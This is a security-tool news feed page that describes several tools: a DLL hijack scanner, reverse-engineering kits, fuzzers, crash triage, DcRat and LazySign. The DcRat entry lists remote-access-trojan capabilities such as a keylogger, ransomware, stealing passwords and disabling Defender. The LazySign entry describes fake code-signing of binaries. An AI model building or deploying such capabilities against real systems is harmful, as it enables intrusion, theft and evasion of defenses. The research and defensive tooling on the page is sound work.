โŒ
There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

By: Zion3R
15 March 2021 at 11:30


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory with DLLHSC and detour named payload32.dll for x86 and payload64.dll for x64 architecture.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) the is not present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports if the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may be shown up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they shown up and reports the results.


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary and LoadLibraryEx, the tool intercepts the call and writes the requested module in the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If the LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules loader applies the normal search order).


Compile and Run Guidance

Should you choose to compile the tool from source it is recommended to do so on Visual Code Studio 2019. In order the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait f or checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error box when dependencies for the payload DLL (exported functions) are not met. In this case, an error message box is poped. DLLHSC by default checks for 10 seconds if a message box was opened or for as many seconds as specified by the user with the flag -t. An error message box indicates that if dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.dll loads the payload DLL :



The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that do not belong in the KnownDLLs list neither are WinSxS dependencies. This mode is aimed to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

By: Zion3R
26 March 2021 at 11:30


This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.



Php_Code_Analysis - San your PHP code for vulnerabilities


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQl injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

By: Zion3R
12 July 2021 at 21:30


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and security
  • Server IP port can be archived through link
  • Multi-Server,multi-port support
  • Plugin system through Dll, which has strong expansibility
  • Super tiny client size (about 40~50K)
  • Data transform with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build๏ผšvs2019
  • Runtime๏ผš
Project Runtime
Server .NET Framework 4.61
Client and others .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • โ€ฆโ€ฆ

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the lastest release.


Attention

ๆˆ‘๏ผˆ็ฐž็ด”๏ผ‰ๅฏนๆ‚จ็”ฑไฝฟ็”จๆˆ–ไผ ๆ’ญ็ญ‰็”ฑๆญค่ฝฏไปถๅผ•่ตท็š„ไปปไฝ•่กŒไธบๅ’Œ/ๆˆ–ๆŸๅฎณไธๆ‰ฟๆ‹…ไปปไฝ•่ดฃไปปใ€‚ๆ‚จๅฏนไฝฟ็”จๆญค่ฝฏไปถ็š„ไปปไฝ•่กŒไธบๆ‰ฟๆ‹…ๅ…จ้ƒจ่ดฃไปป๏ผŒๅนถๆ‰ฟ่ฎคๆญค่ฝฏไปถไป…็”จไบŽๆ•™่‚ฒๅ’Œ็ ”็ฉถ็›ฎ็š„ใ€‚ไธ‹่ฝฝๆœฌ่ฝฏไปถๆˆ–่ฝฏไปถ็š„ๆบไปฃ็ ๏ผŒๆ‚จ่‡ชๅŠจๅŒๆ„ไธŠ่ฟฐๅ†…ๅฎนใ€‚
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files

By: Zion3R
23 August 2021 at 21:30


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capeable of stealing or forging fake signatures for binary files. All of these tools however, have additional dependencies which require Go,python,...


This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ยฏ\(ใƒ„)/ยฏ



Karta - Source Code Assisted Fast Binary Matching Plugin For IDA

By: Zion3R
11 September 2021 at 11:30


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that it's main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (number of functions in the open source) instead of N (size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported since versions v2.0.0 and above.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the existing (supported) open source libraries within the binary. No more need to reverse engineer the same open-source library again-and-again, simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29 for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source used external functions (memcpy, fread, or zlib_inflate), Karta will also attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure of the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library

By: Zion3R
12 September 2021 at 20:30


AutoHarness is a tool that automatically generates fuzzing harnesses for you. This idea stems from a concurrent problem in fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep into the library. It is very hard or sometimes even impossible for smart fuzzers to reach that codepath. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered in fuzzing. Hence, this program tries to alleviate this problem in some capacity as well as provide a tool that security researchers can use to initially test a code base. This program only supports code bases which are coded in C and C++.


Setup/Demonstration

This program utilizes llvm and clang for libfuzzer, Codeql for finding functions, and python for the general program. This program was tested on Ubuntu 20.04 with llvm 12 and python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief subprocess os argparse ast;

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results: ย 

ย It is definitely possible to raise the success by further debugging the compilation and adding more header files and more. Note the nginx project does not have any shared objects after compiling. However, this program does have a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way implemented in the program to fuzz functions with multiple arguments is by using fuzzing data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem which I come across when coding this is with codeql and nested structs. It becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  1. Implementation Based Harness Creation

Using codeql, it is possible to use to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for implementations for the function that exist in the library and use that information to make an educated guess on an implementation of the function as a harness. The problems I currently have with this are generating the control flow graphs with codeql.


  1. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and see if it is valid bug or if it is just an implementation bug. Also, you can enable the debug mode if some functions are not compiling. This will help you understand if there are some header files that you are missing or any linkage issues. If the project you are working on does not have shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


AFLTriage - Tool To Triage Crashing Input Files Using A Debugger

By: Zion3R
9 December 2021 at 20:30


AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging crashes generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.

Some notable features include:

  • Multiple report formats: text, JSON, and raw debugger JSON
  • Parallel crash triage
  • Crash deduplication
  • Sanitizer report parsing
  • Supports binary targets with or without symbols/debugging information
  • Source code and variables will be annotated in reports for context

Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitablity. Accurate exploitability classification is very target and scenario specific and is best left to specialized tools and expert analysts.


Usage

Usage of AFLTriage is quite straightforward. You need your inputs to triage, an output directory for reports, and the binary and its arguments to triage.

Example:

$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@
AFLTriage v1.0.0

[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))
[+] Image triage cmdline: "./target_binary --option-one @@"
[+] Reports will be output to directory "reports"
[+] Triaging AFL directory fuzzing_directory/ (41 files)
[+] Triaging 41 testcases
[+] Using 24 threads to triage
[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)
[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]

Similar to AFL the @@ is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.

Building and Running

You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:

cd afltriage-rs/
cargo run --help

<compilation>

Finished dev [unoptimized + debuginfo] target(s) in 0.33s
Running `target/debug/afltriage --help`

<AFLTriage usage>
...

Extended Usage

debugging output of triage operations. -h, --help Prints help information -V, --version Prints version information ARGS: <command>... The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or --stdin. Optionally use -- to delimit the start of the command. ">
afltriage 1.0.0
Quickly triage and summarize crashing testcases

USAGE:
afltriage -i <input>... -o <output> <command>...

OPTIONS:
-i <input>...
A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to
be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the
last argument passed to AFLTriage -- this is reserved for the command.
-o <output>
The output directory for triage report files. Use '-' to print entire reports to console.

-t, --timeout <timeout>
The timeout in milliseconds for each testcase to triage. [default: 60000]

-j, --jobs <jobs>
How many threads to use during triage.

--report-formats <report_format s>...
The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible
values: text, json, rawjson]
--bucket-strategy <bucket_strategy>
The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,
first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]
--child-output
Include child output in triage reports.

--child-output-lines <child_output_lines>
How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not
recommended). [default: 25]
--stdin
Provide testcase input to the target via stdin instead of a file.

--profile-only
Perform environment chec ks, describe the inputs to be triaged, and profile the target binary.

--skip-profile
Skip target profiling before input processing.

--debug
Enable low-level debugging output of triage operations.

-h, --help
Prints help information

-V, --version
Prints version information


ARGS:
<command>...
The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or
--stdin. Optionally use -- to delimit the start of the command.

Related Projects



Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers

By: Zion3R
3 March 2022 at 11:30


Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.


It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.

./ and give your target... a lite fuzz.

$ sudo apt install latex2rtf

$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details

This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.

why

